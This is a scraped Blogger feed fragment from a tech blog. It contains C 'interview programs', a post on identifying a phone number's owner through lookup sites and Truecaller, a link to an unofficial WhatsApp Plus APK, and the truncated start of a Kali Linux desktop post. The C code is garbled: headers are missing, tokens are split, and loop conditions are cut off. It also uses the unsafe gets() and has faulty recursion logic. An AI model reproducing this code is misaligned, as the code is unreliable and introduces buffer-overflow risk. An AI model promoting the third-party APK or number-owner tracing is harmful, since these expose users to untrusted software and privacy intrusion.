&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
27.WAP to print&#39;xay&#39;in place of every&#39;a&#39;in a string.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
#include&lt;br /&gt;#include&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;int i=0;&lt;br /&gt;char str[100],x =&#39;x&#39;,y=&#39;y&#39; ;&lt;br /&gt;printf(&quot;En ter the string\n:&quot;);&lt;br /&gt;gets(str);&lt;br /&gt;while(str[ i]!=&#39;\0&#39;)&lt;br /&gt;{&lt;br /&gt;if(str[i]= =&#39;a&#39;)&lt;br /&gt;{&lt;br /&gt;printf(&quot;%c &quot;,x);&lt;br /&gt;printf(&quot;%c &quot;,str[i++] );&lt;br /&gt;printf(&quot;%c &quot;,y);&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;printf(&quot;%c &quot;,str[i++] );&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;getch();&lt;br /&gt;}&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
28.Count the Total Number of 7 comming between 1 to 100.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
/* I made this code in a way that u can give Upper limit i.e. 100,Lower limit i.e. 1 and the specific number u wants to count in between i.e. 7 */&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
#include&lt;br /&gt;#include&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;int i,j,U=100, L=1,count= 0,r=1,n;&lt;br /&gt;clrscr();&lt;br /&gt;printf(&quot;\n Enter the number u wants to count\n:&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;n);&lt;br /&gt;printf(&quot;\n Enter the lower limit\n:&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;L);&lt;br /&gt;printf(&quot;\n Enter the upper limit\n:&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;U);&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
for (i=L;i&lt;br /&gt;{&lt;br /&gt;j=i;&lt;br /&gt;while(j)&lt;br /&gt;{&lt;br /&gt;r=j%10;&lt;br /&gt;if (r==n)&lt;br /&gt;{&lt;br /&gt;count++;&lt;br /&gt;}&lt;br /&gt;j=j/10;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;if(n==0&amp;amp;&amp;amp;L ==0)&lt;br /&gt;count++;&lt;br /&gt;printf(&quot;\n Total Number of %d between %d and %d = %d&quot;,n,L,U, count);&lt;br /&gt;getch();&lt;br /&gt;}&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
29. Code for duplicate&#39; s removal,by Amit Aru.&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;int i,j,k=0,co unt[300]={ 0};&lt;br /&gt;char ch,str[100 0],str1[10 00];&lt;br /&gt;clrscr();&lt;br /&gt;printf(&quot;\n Enter the string to remove duplicasy\ n:&quot;);&lt;br /&gt;gets(str);&lt;br /&gt;for (i=0;str[i ]!=&#39;\0&#39;;i+ +)&lt;br /&gt;{&lt;br /&gt;ch=str[i];&lt;br /&gt;count[&#39;&#39;]=0; / * U can use other delimiter inplace of space&#39;&#39;here,just put that char inside&#39;&#39;,for ex: count[&#39;A&#39;]=0 ; if u dnt want any delimiter, just remove this line.*/&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
if(count[c h])&lt;br /&gt;continue;&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;str1[k++]= ch;&lt;br /&gt;count[ch]= 1;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;puts(str1) ;&lt;br /&gt;getch();&lt;br /&gt;}&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
30. WAP to find out if a given number is a power series of 2 or not,withou t any loop and without using % modulo operator.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
#include&lt;br /&gt;#include&lt;br /&gt;int pow2(float );&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;int i,flag;&lt;br /&gt;clrscr();&lt;br /&gt;printf(&quot;En ter the number\n&quot;) ;&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;i);&lt;br /&gt;flag=pow2( i);&lt;br /&gt;if(flag)&lt;br /&gt;printf(&quot;\n %d is power series of 2&quot;,i);&lt;br /&gt;else&lt;br /&gt;printf(&quot;\n %d is not a power series of 2&quot;,i);&lt;br /&gt;getch();&lt;br /&gt;}&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
int pow2(float j)&lt;br /&gt;{&lt;br /&gt;static float x;&lt;br /&gt;x=j/2;&lt;br /&gt;if(x==2)&lt;br /&gt;return 1;&lt;br /&gt;if(x&lt;br /&gt;return 0;&lt;br /&gt;x=pow2(x);&lt;br /&gt;}&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/2623534071096737091/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/10/top-30-c-programs-asked-in-interview.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2623534071096737091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2623534071096737091'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/10/top-30-c-programs-asked-in-interview.html' title='Top 30 C programs asked in interview'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-5868239028397091083</id><published>2014-03-31T12:24:00.000+05:30</published><updated>2014-03-31T12:26:08.792+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Android"/><category scheme="http://www.blogger.com/atom/ns#" term="Apple"/><category scheme="http://www.blogger.com/atom/ns#" term="Blackberry"/><category scheme="http://www.blogger.com/atom/ns#" term="Iphone"/><category scheme="http://www.blogger.com/atom/ns#" term="Mobile"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>How to Trace a Mobile No. Owner Name</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: center;&quot;&gt;
&lt;div class=&quot;slingpic subtle right&quot; data-img-hash=&quot;17994&quot; style=&quot;bottom: auto; display: inline-block; float: none; height: 200px; left: auto; margin: 0px; max-width: 613.133px; position: relative; right: auto; top: auto; width: 415px;&quot;&gt;
&lt;img border=&quot;0&quot; class=&quot;slingpic_reset&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij-SfQbmEUubxN-RFaMFjov28-eykQXxd6tzc7_7ZScSQf6Ff9yIQp9anvO7oowJwimIc1rdfS2AIPlgW45BDG9_wE_VJnvSpoK2m5JFaigDYErJHV01Digk-kIKGhh9ywTPgJQA2wgYSw/s1600/Trace+a+Mobile+Number+with+Name,Location+&amp;amp;+Operator+%282%29.jpg&quot; style=&quot;border: 0px;&quot; title=&quot;&quot; /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
Hi friends, in today&#39;s world&#39;s lifestyle mobile is the most important device for daily life and now a days every one is having mobile no matter of their class or richness even a rickshaw driver have a personal mobile with him :P . So often the disadvantages are equal to the advantages.One major problem which is increasing day by day is getting MISSED CALLS and prank calls. Some times this may lead to some serious issue so for this problem i am writing an article&amp;nbsp; How can you trace mobile number by yourself ? you can use this tutorial as well if you wanna know the identification of the mobile number owner. Ok lets get started.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;a href=&quot;https://www.blogger.com/null&quot; name=&quot;more&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot;&gt;&lt;/a&gt;Tracing a Mobile Number:&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;b&gt;1.Mobile telephone numbering in India:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Here in this method we can see list of&amp;nbsp; of mobile numbers with location and telecom operator. all you need is to just search the list first four digits. This process is bit confussing and takes some time.&amp;nbsp;&lt;a href=&quot;http://en.wikipedia.org/wiki/Mobile_telephone_numbering_in_India&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Click here&lt;/a&gt;&amp;nbsp;to go to wikipedia page&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2.Trace mobile number by online:&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;br /&gt;
Here in this process you can trace mobile number by just entering&amp;nbsp; the number you want to trace in the search column click the below link to trace mobile number&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;a alt=&quot;Tracing a Mobile Number with Name,Location &amp;amp; Operator&quot; href=&quot;http://tracker.mobileringtonesstore.com/&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot; target=&quot;_blank&quot; title=&quot;Tracing a Mobile Number with Name,Location &amp;amp; Operator&quot;&gt;Trace mobile number and location ( helps us to see location&amp;nbsp; on map)&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6430fw1omigPVMmLmK6OzU_m4zlIs8GnHr6CxzG3r-CPVIuYTvO0j8JfVqnFKZy1Es8yg-pWbuX1BLronahZESvplSQvE9ge_grNm4ABsW0CiwB12qWp3gMTL_mXgqeCzSaUOT5lvs-Q/s1600/Trace+a+Mobile+Number+with+Name,Location+&amp;amp;+Operator.JPG&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #6699cc; margin-left: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6430fw1omigPVMmLmK6OzU_m4zlIs8GnHr6CxzG3r-CPVIuYTvO0j8JfVqnFKZy1Es8yg-pWbuX1BLronahZESvplSQvE9ge_grNm4ABsW0CiwB12qWp3gMTL_mXgqeCzSaUOT5lvs-Q/s1600/Trace+a+Mobile+Number+with+Name,Location+&amp;amp;+Operator.JPG&quot; height=&quot;322&quot; style=&quot;border: none; position: relative;&quot; title=&quot;&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;slingpic subtle right&quot; data-img-hash=&quot;83455&quot; style=&quot;bottom: auto; display: inline-block; float: none; height: 497px; left: auto; margin: 0px; max-width: 613.133px; position: relative; right: auto; top: auto; width: 613px;&quot;&gt;
&lt;br /&gt;
Mobile Number Locator Software Download:&lt;br /&gt;
When you download mobile number locator software you can trace mobile number from your mobile&lt;br /&gt;
&lt;a href=&quot;http://download.cnet.com/Mobile-Number-Locator/3001-10440_4-10893517.html?spi=b1930c7de8265e2f0a1f215e8ff5a987&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Download Mobile number locator&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Other Methods of Tracing Name Using Mobile Number:&lt;br /&gt;
To Trace Mobile Number with Name download the True Caller app from it&#39;s&amp;nbsp;&lt;a href=&quot;http://www.truecaller.com/&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;official website&lt;/a&gt;&amp;nbsp;and ENTER THE MOBILE NUMBER and you will able to do the following things:&lt;br /&gt;
You Can Trace Mobile number with Name upto 90% Correctly&lt;br /&gt;
You Can Download This APP on your Android Mobile&lt;br /&gt;
You can Download this app to your PC running Android Apps on PC&lt;br /&gt;
&lt;br /&gt;
Download True caller for your Mobile Now:&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://www.google.co.in/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=1&amp;amp;cad=rja&amp;amp;ved=0CC4QFjAA&amp;amp;url=https%3A%2F%2Fitunes.apple.com%2Fus%2Fapp%2Ftruecaller-global-phone-directory%2Fid448142450%3Fmt%3D8&amp;amp;ei=idv0UJihBcPKrAeH5oCYBQ&amp;amp;usg=AFQjCNECTP3z80GKjj2RSkWYGyRxYC1LJQ&amp;amp;bvm=bv.41018144,d.dGI&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Download For Android&amp;nbsp;&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://www.google.co.in/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=2&amp;amp;cad=rja&amp;amp;ved=0CDMQFjAB&amp;amp;url=http%3A%2F%2Fm.truecaller.com%2F%3Fp%3Ddownload%26os%3Dwinphone_7%26mid%3D148&amp;amp;ei=1tv0UJyGPIPwrQf7l4D4CQ&amp;amp;usg=AFQjCNGFFB8KJ4kMlH1zAy5p7XOru4tTIQ&amp;amp;bvm=bv.41018144,d.dGI&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Download For IOS&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.truecaller.com/&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Download For Windows Mobile&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.truecaller.com/download&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Download For Blackberry&amp;nbsp;&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.truecaller.com/download&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Download For Symbian&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/5868239028397091083/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/03/how-to-trace-mobile-no-owner-name.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/5868239028397091083'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/5868239028397091083'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/03/how-to-trace-mobile-no-owner-name.html' title='How to Trace a Mobile No. Owner Name'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij-SfQbmEUubxN-RFaMFjov28-eykQXxd6tzc7_7ZScSQf6Ff9yIQp9anvO7oowJwimIc1rdfS2AIPlgW45BDG9_wE_VJnvSpoK2m5JFaigDYErJHV01Digk-kIKGhh9ywTPgJQA2wgYSw/s72-c/Trace+a+Mobile+Number+with+Name,Location+&amp;+Operator+%282%29.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-2888264172285191409</id><published>2014-03-31T12:21:00.001+05:30</published><updated>2014-03-31T12:22:22.128+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Android"/><category scheme="http://www.blogger.com/atom/ns#" term="Applications"/><category scheme="http://www.blogger.com/atom/ns#" term="Mobile"/><title type='text'>New Experience of WhatsApp: WhatsApp+</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: center;&quot;&gt;
&lt;div class=&quot;slingpic subtle right&quot; data-img-hash=&quot;43249&quot; style=&quot;bottom: auto; display: inline-block; float: none; height: 217px; left: auto; margin: 0px; max-width: 613.133px; position: relative; right: auto; top: auto; width: 400px;&quot;&gt;
&lt;img alt=&quot;Download Whatsapp Plus APK for Android (APK) Latest Version Free &quot; border=&quot;0&quot; class=&quot;slingpic_reset&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXPk-a0AcvwQ4HA5gWAlpflyddv-Ila15cwwaoqw242f0IXwhg_ehXOdXn7S0WwBc0pNY2KpTWg7xuoVEjKSuuwQQ7nWr4haOpG2o1eC6TSIptv40qR3CZPYmSJIauUoDXWVBsAhGucY_N/s1600/Download+Whatsapp+Plus+APK+for+Android+%28APK%29+Latest+Version+Free.jpg&quot; style=&quot;border: 0px;&quot; title=&quot;Download Whatsapp Plus APK for Android (APK) Latest Version Free&quot; /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;a href=&quot;https://www.blogger.com/null&quot; name=&quot;more&quot; style=&quot;background-color: white; border: 0px; color: #6699cc; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px; text-decoration: none;&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style=&quot;-webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20.790000915527344px; orphans: auto; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot;&gt;
Hi friends, as you know that Whatsapp is simply ruling the smart world. No doubts in saying this that every 90 people out of 100 smart phone users have Whatsapp messenger in their phones. This awesome app is being used by almost people of all ages, not only teenagers. The good news is that now the improved version of the Whatsapp messenger&amp;nbsp;&lt;b&gt;Whatsapp plus&amp;nbsp;&lt;/b&gt;is available in the market for downloading.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.whatsapp-plus.net/download.php&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #6699cc; font-size: 15px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Download here&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/2888264172285191409/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/03/new-experience-of-whatsapp-whatsapp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2888264172285191409'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2888264172285191409'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/03/new-experience-of-whatsapp-whatsapp.html' title='New Experience of WhatsApp: WhatsApp+'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXPk-a0AcvwQ4HA5gWAlpflyddv-Ila15cwwaoqw242f0IXwhg_ehXOdXn7S0WwBc0pNY2KpTWg7xuoVEjKSuuwQQ7nWr4haOpG2o1eC6TSIptv40qR3CZPYmSJIauUoDXWVBsAhGucY_N/s72-c/Download+Whatsapp+Plus+APK+for+Android+%28APK%29+Latest+Version+Free.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-2579046514588713224</id><published>2014-03-31T12:19:00.002+05:30</published><updated>2014-03-31T12:19:56.163+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ethical Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Kali Linux"/><category scheme="http://www.blogger.com/atom/ns#" term="Unix/Linux"/><title type='text'>How to install/remove different KDE Desktop Environments in Kali Linux</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; margin: 0px; position: relative;&quot;&gt;
&lt;a class=&quot;grouped_elements&quot; href=&quot;http://i1.wp.com/www.blackmoreops.com/wp-content/uploads/2013/10/kde-logo-oxygen-2760.png&quot; rel=&quot;tc-fancybox-group294&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot;&gt;&lt;img alt=&quot;KDE Desktop Logo - blackMORE Ops&quot; class=&quot;alignnone  wp-image-12&quot; data-recalc-dims=&quot;1&quot; src=&quot;http://i1.wp.com/www.blackmoreops.com/wp-content/uploads/2013/10/kde-logo-oxygen-2760.png?resize=180%2C180&quot; style=&quot;border: none; position: relative;&quot; /&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;h3 style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; margin: 0px; position: relative;&quot;&gt;
How to install/remove different KDE Desktop Environments in Kali Linux&lt;/h3&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;K Desktop Environment (KDE) was founded in 1996 by Matthias Ettrich, who was then a student at the Eberhard Karls University of Tübingen. At the time, he was troubled by certain aspects of the Unix desktop. Among his concerns was that none of the applications looked, felt, or worked alike. He proposed the creation of not merely a set of applications but a desktop environment in which users could expect things to look, feel, and work consistently. He also wanted to make this desktop easy to use; one of his complaints about desktop applications of the time was that his girlfriend could not use them. His initial Usenet post spurred a lot of interest, and the KDE project was born.&lt;/span&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;The name KDE was intended as a wordplay on the existing Common Desktop Environment, available for Unix systems. CDE was an X11-based user environment jointly developed by HP, IBM, and Sun through the X/Open consortium, with an interface and productivity tools based on the Motif graphical widget toolkit. It was supposed to be an intuitively easy-to-use desktop computer environment. The K was originally suggested to stand for “Kool”, but it was quickly decided that the K should stand for nothing in particular. The KDE initialism is therefore expanded to “K Desktop Environment”.&lt;/span&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;—-&lt;/span&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;b style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;## KDE Desktop ##&lt;/b&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;—-&lt;/span&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 